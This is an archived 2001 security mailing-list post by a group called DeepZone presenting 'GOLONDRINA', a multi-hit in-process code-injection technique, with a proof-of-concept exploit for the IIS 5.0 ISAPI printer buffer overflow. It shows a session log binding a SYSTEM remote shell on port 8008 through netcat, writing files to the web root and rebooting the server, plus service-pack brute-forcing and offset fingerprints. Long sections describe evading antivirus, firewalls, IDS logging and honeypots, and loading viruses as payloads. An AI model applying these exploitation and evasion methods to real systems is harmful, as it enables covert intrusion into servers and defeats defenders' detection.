-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 This post contains a draft + exploit (attached) describing an alternative approach to break in NT-b0fs. Proof of concept exploit breaks in Windows 2000 sp0/sp1. A lot of information is pointing to "NT-b0f researchers". Some "sections" can be good stuff for IDSers and honeypoters. Pen-testers can test exploit getting OS fingerprints with DeePo. Microsoft and friends can read our "Ethical compromise or dancing with the most sexy company ..." section in Draft. Draft contains "ASCII ART". If you have problems viewing this paper you will find a copy at ... http://www.deepzone.org/quick.asp?link=golondrina Finally notice the early stage of development. It can be unstable code but proof of concept exploit is working very fine in our computers (lab environment). In our opinion GOLONDRINA gives us a new perspective and more possibilities of intrussion having important consecuences in traditional and common defense- techniques ... regards, |Zan - ----- 2001/12/22 --==[ Uploading code IN-PROCESS - CodeName: GOLONDRINA! ]==-- DeepZone Digital Security - http://www.deepzone.org by |Zan <izanat_private> ----------------- "Volverán las oscuras golondrinas en tu balcón sus nidos a colgar, y otra vez con el ala a sus cristales jugando llamarán. Pero aquellas que el vuelo refrenaban tu hermosura y mi dicha a contemplar, aquellas que aprendieron nuestros nombres ... ¡esas... no volverán!." .... Gustavo Adolfo Bécquer (1836-1870) ----------------- About this draft! - ----------------- This post is carrying a remote exploit to W2k/IIS 5.0 sp0 and sp1. This "toy" is only proof of concept code showing an "Uploading code IN-PROCESS" basic implementation - A.K.A *GOLONDRINA* technique - on NT servers. In fact, this exploit is abusing an "old" vulnerability discovered by eEye months ago. [2] This vulnerability was named "Remote IIS ISAPI Printer Extension Buffer Overflow" and i'll try show adventages and disadventages exploiting this vulnerability with GOLONDRINA technique in mind. People running only exploits or pen-testing networks will see that this exploit *ONLY* binds a remote shell on 8008 port. Actually "single-hit" exploits exist and they get same effect in a more safe way. I am presenting this exploit like an "alternative" on traditional exploitation ways although i am studying its behaviour yet. It can be seen like work-in-progress. I choose "Remote IIS ISAPI Printer Extension Buffer" vulnerability only like a typical commercial code to exploit. Golondrina technique is quite general and it was tested on products with bof problems like iPlanet, IIS, ZBServer ... and results were *very good*. New problems arisen but a lot of common and traditional problems exploiting bofs dissapear. This post isn't a full detailled paper. It is only a draft with my progress and ideas searching feedback and valuable comments. I am going to try a readable style where my "fantastic english" doesn't generate a lot of noise. Ethical compromise or dancing with the most sexy company: Microsoft! - -------------------------------------------------------------------- Before i begin to outline some new problems and real impact with Golondrina exploits i'd like spread some words about BugTraq community, full-disclosure, some commercial groups and the most important: our old *exiled* but not forgotten fellows. Sometimes when i am reading BugTraq i can see a lot of people arguing about non very important things closed to authentic security and bugs impact. Sadly, i am seeing a lot of commercial people/vendors/security firms crying about exploits released by individuals or non-profit organizations. I'd like to remember them where they are: a free full-disclosure list. This is not the right place to show indignation spamming another readers and generating a cycle-war with cross-postings. In this post i am not going to argue about full-disclosure with white-hats, black-hats, kiddies, lamerz ... or any electronic tribe. In mi opinion i am going to write about a *very old and public* bug with a lot of patches and updates availables. In the another hand this vulnerability is only a launch-pad to show a general and portable bof technique. This post point to free underground people and security researches. Target is feedback and communication sharing ideas and work. If you only want to argue about full-disclosure then you can try to mail to Scott Culp with a proper subject ... mmmm ... "It's Time to End Information Anarchy" can be a good subject to obtain his attention ... or not!. If we win friends like "Microsoft Security Response Center" (writing spam and innocent bulletins on BugTraq) and we lose more old and good friends like "Teso Team" and another BugTraq's "exiled" friends then i'd like to know what's happening here and if BugTraq and the Underground Security Comunity are being infected by Microsoft and the war by "third partys" to get "security bussiness". Well, previous lines are only my personal opinion about how commercial world can *kill our public knowledgement source and our main way to share it* ... It's time to dance with the most sexy company today ... Microsoft! Uploading code IN-PROCESS - CodeName: GOLONDRINA! - ------------------------------------------------- Actually bofs can be observed like two differents parts: injector + payload. If it is a friendly b0f then you can exploit it with a single-hit exploit containing injector + payload and gaining full control over remote process (this is the most common way!) If it isn't a friendly b0f then you can elaborate a more general injector, download your payload to disk and then execute it. Both techniques have pros and cons: portability, reusability, very noisy intrussion ... I have been working on another "general technique" last months: GOLONDRINA technique. Since a theorical perspective it can be described like a very elaborated and multi-part injector taking any general payload like a "component" or "object". In this context "injector" is formed by different functional components and they work several times along the intrussion: - LOCATOR. Work on relocatable code proportioning independence and fixing offsets and deviations. - PATCHER. Store pointers, API addresses (avoid page faults in process). - ALLOCATER. Allocate functional "code bags". Stealth & Evasion. - COPYER. Re-generate original payload (decrypt. and sync. hits). - JUMPER. Obtain main "code bag" and execute original payload. Payload has to be relocatable code. Payload gives us its work and return control. It can be seen like an object or component with a method only. We can say that GOLONDRINA technique takes control over remote overflow with secuential hits connecting on trusted ports. Each hit overflows a single thread, makes its work and keep living remote software. Hits are sequentials but they can take control on any time. Simultaneus hits (multithread attack) are possible too. Sync. and delays are VERY important! In a nutshell, GOLONDRINA exploits can inject tiny slices of relocatable code in vulnerable process avoiding some traditional limitations and providing opportunities to pre-fabricated code and abstraction. Like we are going to see it gives us a fantastic power to build very elaborated payloads kicking traditional protections like Antivirus, some IDS's heuristics or firewalls. Old and new problems found and "solved"! - ---------------------------------------- In this "section" i am going to outline some common problems with possible solutions and how they were solved in my proof of concept implementation. I only am outlining the most quick path with a BASIC implementation. Tiny Buffers or very long payloads ? - ------------------------------------ Actually if we find those problems then we run a different approach (an injector downloading and executing payload is a good solution) but if buffer is very tiny we get troubles downloading that code (not enought space to code a minimal downloader). GOLONDRINA fights with those problems generating slices and sending the appropiate injector along the intrussion with each slice. Each slice can contain code, data, another shrunk injector ... It lets to exploit the vulnerability avoiding size restrictions. Exploiter chooses the "exploitation block" and exploit calculate number of hits and makes dirty job. Note: Injector (m types) -> (p <= m) n*slice = original payload cheap ASCII art - --------------- injector(type 1) + slice = hit 1 --- | injector(type 2) + slice = hit 2 --- | injector(type 2) + slice = hit 3 --- |F| | |i| injector(type 2) + slice = hit 4 --- |r| | trusted |e| port ......... ------> |w| ----> (Buggy Application) | |a| injector(type 3) + slice = hit x --- |l| | |l| ......... | injector(type p) + slice = hit n --- Abstraction & Object Oriented Exploits - -------------------------------------- GOLONDRINA exploits can join several hits and rebuild original payload in a remote overflowed process. It lets build components or abstract payloads. I am speaking about pre-fabricated code. Some examples can be: Writing a file to disk, hashes-dumper or a remote-shell. Reusing code or porting tools in "components or payloads" is possible (think that it isn't very usefull!). Another possibility is "components-chainning" (DumperHashes+WriteToDisk). It is possible but it is innecesary if you get a full intrussion. In my example exploit i ran our "Rapid Exploit Development tool" (RED tool) to get a pre-fabricated component: a remote shell on 8008 port [3]. This "cheap toy" was released a year ago exactly. In this moment we have tracked 5 remote SYSTEM exploits with this tool. Some exploits tracked over BUGTRAQ running this tool are affecting to IIS, Check Point Firewall-1, Compaq Insight Manager and LiveStats. When anybody can build a "10 minutes exploit" then we start to kill "0-day exploits" and "trading" ... Downloading & executing code vs. Uploading code IN-PROCESS - ---------------------------------------------------------- Downloading & executing code is a "very safe" way to take control. It needs (generally) a single-hit exploit with a back-connection, and then a general- payload is downloaded & executed. Uploading code IN-PROCESS handles another concept. You can run this technique if you don't want a "very noisy" intrussion in OS. It gives you opportunities to bypass any potential problem abusing a trusted process. Imagine, for example, the next scenaries: - "They" have an antivirus installed. Downloading & executing you are creating a new process. Antivirus can hook&check that new image being loaded from hard disk. Uploading IN-PROCESS you are smashing a trusted process. It isn't going to be checked each 10 minutes - of course - to see if it has being infected. - Router, Firewalls ... If you download a payload you create an outgoing connection. It can be filtrated in a very hostile environment. Uploading IN-PROCESS you talk to trusted ports. You can launch each hit through of several and different proxys *at different times*!!!! (it's only a very extreme example!). Another situations are possible. Old technology become new stuff ... - ----------------------------------- What is a virus ? ... yes, it is a cycle-code and relocatable. Generally they takes a tiny size (2k-3k). In theory they can be imported with a correct "exploitation block" on GOLONDRINA exploits avoiding null bytes and restrictions. Note that it'd generate quite slices and it'd have to be mutate previously. A lot of compression engines and another fantastic resources are availables in viral technology ... they only need tiny mutations and they run very fine. Can you imagine a very high ratio compression in assembly? ... mmmm ... 10:1 would be enough to provide a lot of "features" ... Brute-forcing. What Service Pack is installed ? - ----------------------------------------------- A traditional problem in b0fing happens when you don't know the correct service pack. You don't know the offsets or valid values then your exploit fails ... Although the next technique can be usefull on single-hit exploits i designed it to avoid remote server crashes on GOLONDRINA exploits. Some fantastic exploiters released some exploits overwritting exception frames ... but ... why we're overwriting them when we can abuse them too ? If you inoculate or upload a first "test slice" you can adivinate what service pack is being ran. If it fails then exception frame can catch your fault and your Remote-IPC component don't return the correct reply. The previous lines are only an example. It is code dependent but fortunately there are another ways. In attached exploit you can see like brute-forcing is possible. I abuse an IIS exception frame previously installed. If server is handling n-threads then exploit will freeze one thread with each unsucessfully bruteforce test. Actually i test 2 enviroments (Win2k server sp0 & sp1) so if sp1 is installed exploit'd work with (n-1) threads availables. Think that brute forcing is only implemented like proof of concept working very good. In a real attack we'd receive a nmap scan or similar. NULL and problematic bytes, printables shellcodes ? - --------------------------------------------------- NULL and problematic bytes stop a lot of times our payloads on a single-hit exploit. Writing 2k of code worried about printable style isn't a good solution. When you have a look in my GOLONDRINA exploit you can see that a multi-part injector is relatively short in size. A printable multi-part injector is possible. Payloads aren't a problem. You can fit them with a good "exploitation block" encoding (XORing for example) each hit with a different stealth. In this way each slice can contain valid and printables bytes landing in a valid printable scale. Think that a good programming style avoid problems and the previous lines are only possible in theory. Killing emulators and virtualization monitors! - (stuff to hpoters/IDSers ;) - ---------------------------------------------------------------------------- HoneyPots are on fashion. A lot of people is playing with plex86, VMWare ... and a lot of similar software catching malware. Some traffic analyzers can save and rebuild on-fly exploits and more. There are some good implementations around underground to kill some well-know virtualizators or detect anomalous "response-times". GOLONDRINA gives us "lightweight status exploits" in-process. Notice that if you implement "component-chainning" or run a previous "killer-slice" you can detect (sometimes kill) this software *compromising only* some code and stopping your exploit in an early exploitation stage. Then you can send any garbage data or a false payload to remote software reversers. Who's the honeypoter then ? ... a lot of possibilities. Notice that analyzer software rebuilds payloads tracking a TCP/IP connection, generally a single-hit exploit. It's different with only same GOLONDRINA attack generating multiples connections from one or differents IPs at different times. In theory you can store a portion of your payload on victim process and the next days inject more code (different attack or infection stages) although it isn't very practical way but theorically it is possible if server isn't restarted along some time. For example: 15:23 am 21/february/xxxx => first hit (killer-slice. It isn't a VM!) 18:24 pm 21/february/xxxx => (n-1) hits (payload has been inoculated!) 13:38 pm 30/february/xxxx => last hit (we take control!) If IDS logs are removed every week when we take control 30/february (9 days later!) they can have a lot of problems to rebuild our attack getting our payload & exploit. It's only an example of course ;) Keep living the server! - ----------------------- Actually if you take full control over remote process you haven't any problem to keep living the server. IISPrnIsapi exploit don't abuse IIS's automatic restart. If that "feature" is deactivated exploit will continue working. In example you can see like the word "Micros0ft" lives along the hack while i don't force a reboot IISPrnIsapi: A GOLONDRINA exploit! - ---------------------------------- When we overflow IIS then a stack overflow appears on *420* characters aprox. I choose an "exploitation block" about 180 bytes along different stages. Notice the different sizes: 180 <<< 420. Exploit can be configured in two modes: - - Default Mode. *SPANISH VERSION* only. - - Custom Mode Attack. International version. [*] "Default Mode" You have to set "customAttack" to "false" (line 22). It works on Windows 2000 Server Spanish edition. This configuration shows like brute forcing is possible. Next, i am going to write is a hacking session where you'll see exploit running. Exploit was coded in Java so it'll run in any JVM-aware (Windows, Solaris, Linux ...). Attack is launched against a Windows 2000 Spanish Server/IIS5.0 running an unknown service pack. - -- begin hacking-session * Step 1 - we take a Windows 98 SE client running Sun's JVM with netcat! Microsoft(R) Windows 98 (C)Copyright Microsoft Corp 1981-1999. C:\WINDOWS>cd c:\DeepZone C:\DeepZone>javac IISPrnIsapi.java C:\DeepZone>java IISPrnIsapi (c) 1998-2001 DeepZone. IISPrnIsapi Class coded by |Zan [@deepzone.org] Example: java IISPrnIsapi victim [port] Error: need a hostname! * Step 2 - attack is tested over a LAN with '80' like default port! C:\DeepZone>java IISPrnIsapi 192.168.xxx.xxx (c) 1998-2001 DeepZone. IISPrnIsapi Class coded by |Zan [@deepzone.org] Example: java IISPrnIsapi victim [port] :. Default mode activated ... [*] Trying Win2k Server SP0 - Spanish Edition! Checking OS ... IIS/5.0 detected! Patching Server ... OK Vulnerable Server ... NOT detected! [*] Trying Win2k Server SP1 - Spanish Edition! Checking OS ... IIS/5.0 detected! Patching Server ... OK Vulnerable Server ... detected! Allocating memory (16k) ... OK Binding shell on port 8008 (be patient!) ... OK C:\DeepZone> Notes: - First test show an innocent error dialog box but server continue living (it isn't restarted) - Second test detect a vulnerable server (it returned Micros0ft) and allocate 16k memory!!!. I only need over 1'5k but i wanted to test what i could inoculate viruses. 16k is a very large size and it worked very fine. - When it binds a shell it is uploading a component IN-PROCESS (you are working always with legal-connections against a trusted www port). - If you want to connect with that remote console you need a non-firewalled 8008 port. * Step 3 - Server is our friend and it's ok C:\DeepZone>nc 192.168.x.x 80 GET /default.asp <html> <head> <title>Working and fly out pages very fine!</title> </head> <body> ....... C:\DeepZone> * Step 4 - Server was brute-forced! C:\DeepZone>nc 192.168.x.x 80 DeepZone HTTP/1.1 400 Peticion incorrecta Server: Micros0ft-IIS/5.0 Date : Sat, xx yyy tttt 14:09:13 GMT Content-Type: text/html Content-Length: 80 <html><head><title>Error</title></head><body>El parametro no es correcto ... Note: - I sent a wrong request. WWW returned its hacked header containing a ZEROE in Micros0ft. * Step 5 - Get in with SYSTEM privileges if you wish! C:\DeepZone>nc 192.168.x.x 8008 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>cd c:\inetpub\wwwroot C:\Inetpub\wwwroot>echo Write test>izan.asp C:\Inetpub\wwwroot>type izan.asp Write test C:\Inetpub\wwwroot> * Step 6 - While hack is realizated WWW fly out pages too! (Another command.com in my client) Microsoft(R) Windows 98 (C)Copyright Microsoft Corp 1981-1999. C:\WINDOWS>nc 192.168.xxx.xxx 80 GET /izan.asp HTTP/1.1 200 OK Server: Micros0ft-IIS/5.0 <--- ZERO continues present! ... Cache-control: private Write test C:\WINDOWS> * Step 7 - We are SYSTEM and we're going to reboot the MACHINE! C:\Inetpub\wwwroot>net users Cuentas de usuario de \\XXXXXX Administrador Invitado IUSR_XXXXXX ... C:\Inetpub\wwwroot>iisreset/reboot * Step 8 - All is ok, Micros0ft become Microsoft and Bill is a happy guy again! Microsoft(R) Windows 98 (C)Copyright Microsoft Corp 1981-1999. C:\WINDOWS>nc 192.168.xxx.xxx 80 GET /izan.asp HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 <--- ZERO dissapeared }:) ... Cache-control: private Write test C:\WINDOWS> - -- end hacking-session [*] "Custom Mode Attack" You have to set "customAttack" to "true" (line 22). Then you can run any debugger or "DeePo" (an IISPrnIsapi's companion tool). Like i told this exploit launch some hardcoded values in the first steps. It was a design compromise. Idea was test portability in remote-components and show potential problems with their adventages/disadventages. Normally anybody can set up a debugger and get those values but if you have problems getting that system-fingerprint you can run this tool. It is assembly code simulating an easy and cheap debugger over a C-skeleton. It'll give you a printable system-fingerprint. Later, you can change or add your fingerprint in exploit and pen-test your systems. "DeePo" only was tested over Win2k Server and Advanced Server - Spanish version. It should work in any language. Exploit don't need really all those data from your system but since that i unknown if your OS version can change more settings or critical values i had to cover all possible ways. Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\>cd deepzone C:\DeepZone>deepo c:\winnt\system32\inetsrv\inetinfo.exe (c) 2001 DeepZone - Digital Security. DeePo v0.1. Coded by |Zan <izanat_private> - http://www.deepzone.org Syntax: deepo [path to inetinfo.exe] (Ex: deepo c:\winnt\system32\inetsrv\inetinfo.exe) ------------------------------- [*] Dumping IISPrnIsapi's fingerprint ... ----------------------------------------------- 0xcb, 0x4a, 0x33, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x46, 0xe8, 0x77, 0x90, 0x3d, 0xe8, 0x77, 0x54, 0x74, 0x35, 0x6c, 0xad, 0x89, 0x99, 0x98, 0xe5, 0x89, 0x99, 0x98 ----------------------------------------------- C:\DeepZone> Import this fingerprint in IISPrnIsapi's code. Instructions contained in source code and comments. Problems running IISPrnIsapi - ---------------------------- Exploit contains a "DELAY_SECONDS" value. You can modificate this value to get a new sync. value. If exploit fails you can set this value to 30 and run it again. Be patient. When you connect with the remote shell you need a plain-text client like netcat. Some Microsoft's telnet clients won't work. You can see more information about problems and solutions on "References" section. In any way, exploit can fail. It's only proof of concept and run very fine on our test computers. References - ---------- [1] DeepZone's GOLONDRINA (news, updates, DeePo, fingerprints ...) http://www.deepzone.org/quick.asp?link=golondrina [2] eEye's advisory http://www.eeye.com/html/Research/Advisories/AD20010501.html [3] DeepZone's Win32 ShellCode Generator (RED tool) & example exploits http://www.deepzone.org/quick.asp?link=w32scgen [4] Microsoft Security Bulletin http://www.microsoft.com/technet/security/bulletin/MS01-023.asp [5] Microsoft Windows 2000 Server and Advanced Server's patches http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321 [6] Microsoft Windows 2000 Datacenter Server's patches Patches for Windows 2000 Datacenter Server are hardware-specific and available from the original equipment manufacturer. GOLONDRINA FEEDBACK & COPYHACK - ------------------------------ Researching new techniques on NT is a quite difficult thread. We aren't searching comparatives with single-hit exploits (more stables) or problems running this exploit. Our objective is to get progress trying to track new fingerprints giving a new general attack vector. If you want to help us you can send *tested and running* fingerprints at contactat_private They will be published with your e-mail or any contact data if you wish it. Before you send your fingerprints you can want to check if some fellow send the same fingerprint. In that case send us your fingerprint ONLY if your OS version, languaje and service pack don't match with that fingerprint. It can be that several fingerprints match on different platforms. Feedback, good or bad testing will be appreciated but please you don't ask me about illegal activities or if i can help you with basic exploit coding. I have waste precious time building 'DeePo' and building this overview-draft. I am sure that some people can obtain here some good information but feedback is the only way to get more and better information helping full-disclosure. Send us your impressions and "experiences" (electronic experiences of course ;). This paper was written in a technical/non-technical way to reach more people so if you want to distribute this paper you have to do it freely. Closed bulletins or paid-services aren't the correct way but if you have a commercial site where you are getting money and you want to spread this information you can do it ONLY WITH OUR PREVIOUS CONSENTIMENT in a free way. Feel free to contact us in anyway! Remember, this information and source code associated is provided "as is". You can read and run this code in your own risks without any warranty. I can't guarantee that source code with this documentation match exactly what is described, nor can i insure that it's fully stable in your system. In other words this information should be considered as "work in progress". Hack isn't the exploit ... hack is GOLONDRINA itself! About DeepZone - Digital Security! - ---------------------------------- DeepZone - Digital Security! is a european group researching about computing and security. Actually we are developing in Spain. We can be contacted at contactat_private Our Inet's website can be reached at http://www.deepzone.org Unstable GOLONDRINA stuff is maintained at http://www.deepzone.org/quick.asp?link=izan Greetings & Acknowledgments! - ---------------------------- As readers of "Greetings & Acknowledgments" sections are well aware, writing a non-profit draft is never an effort undertaken solely by the authors. I'd like to greet all our friends in 29A! The best international viruXers group. All new international friends and groups contacting us last years and keeping *very good* communications about hacks, NT stuff and more! All security team at eEye.com releasing this vulnerability in a full-way and giving us a commercial & common software bug to release our new and public intrussion's techniques. Good researchers: Jack Barnaby, Greg Hoghlund, Joey__, David Litchfield ... and more. The entire crew at DeepZone.org (^Anuska^, Nemo and TheWizard). Every person who sent in bouquets and brickbats any feedback or greetz. All these people deserve much thanks and credit. Finally, as always, i'd like to offer my largest thanks to my inspiration designing GOLONDRINA, Sandra, the most important hacker in my life. My soul mate. - --] EOT -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> Comment: http://www.deepzone.org/quick.asp?link=izan iQA/AwUBPCTNWUaVob5q1uFzEQKuXQCfQQCob856UoCFkqL3xzrzZ8iu+YQAoKyV C8zNwtlG80zZ/NpjUQbDyww+ =4tEX -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Sat Dec 22 2001 - 11:46:06 PST